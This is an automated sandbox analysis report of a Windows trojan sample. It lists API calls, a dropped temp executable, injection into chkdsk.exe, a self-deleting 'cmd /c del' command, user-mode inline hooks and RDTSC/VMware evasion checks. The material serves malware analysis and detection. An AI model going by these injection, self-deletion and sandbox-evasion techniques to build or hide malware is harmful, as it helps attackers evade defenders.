          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A99D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016AB040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016AA3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016AAD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A95F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016AA770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016AA710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A490 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A410 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A35A NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A492 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A45A NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A53A NtAllocateVirtualMemory,
          Source: inlaww321345.exeVirustotal: Detection: 53%
          Source: inlaww321345.exeReversingLabs: Detection: 56%
          Source: C:\Users\user\Desktop\inlaww321345.exeFile read: C:\Users\user\Desktop\inlaww321345.exeJump to behavior
          Source: inlaww321345.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\inlaww321345.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\inlaww321345.exe "C:\Users\user\Desktop\inlaww321345.exe"
          Source: C:\Users\user\Desktop\inlaww321345.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\inlaww321345.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"
          Source: C:\Users\user\Desktop\inlaww321345.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\inlaww321345.exeFile created: C:\Users\user\AppData\Local\Temp\nsuD94A.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@3/2
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\inlaww321345.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCommand line argument: ^F;
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCommand line argument: ^F;
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: inlaww321345.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\nwmcc\xasivn\insq\a82874181cac4c8c8d839f9e6026f5f4\nkrdof\moxadzwk\Release\moxadzwk.pdb source: inlaww321345.exe, 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp, idczzzzbpy.exe, 00000001.00000000.239867122.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000002.00000000.244915451.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, chkdsk.exe, 00000010.00000002.507707421.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.509886446.00000000058BF000.00000004.10000000.00040000.00000000.sdmp, nsuD94B.tmp.0.dr, idczzzzbpy.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: idczzzzbpy.exe, 00000001.00000003.245625219.000000001A210000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000001.00000003.242881004.000000001A080000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: idczzzzbpy.exe, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B2445 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B2445 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_004168D5 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041E9A8 push dword ptr [25B3BB99h]; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00416CD3 push esi; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00417CF5 pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D4B5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D56C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D502 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D50B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0540D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_009868D5 push ebp; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098E9A8 push dword ptr [25B3BB99h]; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00986CD3 push esi; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00987CF5 pushfd ; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D50B push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D502 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D56C push eax; ret
          Source: C:\Users\user\Desktop\inlaww321345.exeFile created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B1890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\inlaww321345.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000979904 second address: 000000000097990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000979B7E second address: 0000000000979B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 4232Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeAPI coverage: 4.1 %
          Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 9.0 %
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\Desktop\inlaww321345.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000005.00000000.305108660.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: explorer.exe, 00000005.00000000.295963251.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000005.00000000.306086683.0000000008400000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.296016880.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.301612924.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.279924875.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000005.00000000.305220626.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: explorer.exe, 00000005.00000000.305108660.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B7A95 IsDebuggerPresent,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B86ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess token adjusted: Debug
